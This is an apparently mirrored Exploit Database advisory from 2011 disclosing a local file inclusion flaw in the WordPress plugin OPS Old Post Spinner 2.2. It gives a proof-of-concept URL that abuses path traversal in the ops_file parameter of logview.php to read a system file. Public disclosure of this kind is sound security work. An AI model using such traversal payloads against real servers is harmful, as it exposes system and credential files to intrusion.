WordPress Plugin OPS Old Post Spinner 2.2.1 – Local File Inclusion

• Exploit Database
• 11 阅读

• 作者： AutoSec Tools
  日期： 2011-02-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16251/

• Source: http://packetstormsecurity.org/files/view/98751/WordPressOPSOldPostSpinner2.2-lfi.txt
  
  ------------------------------------------------------------------------
  Software................WordPress OPS Old Post Spinner 2.2
  Vulnerability...........Local File Inclusion
  Download................http://1manfactory.com/ops
  Release Date............2/25/2011
  Tested On...............Windows 7 + XAMPP
  ------------------------------------------------------------------------
  Author..................AutoSec Tools
  Site....................http://www.autosectools.com/
  ------------------------------------------------------------------------
  
  --Description--
  
  A local file inclusion vulnerability in WordPress OPS Old Post Spinner
  2.2 can be exploited to include arbitrary files.
  
  
  --PoC--
  http://localhost/wordpress/wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini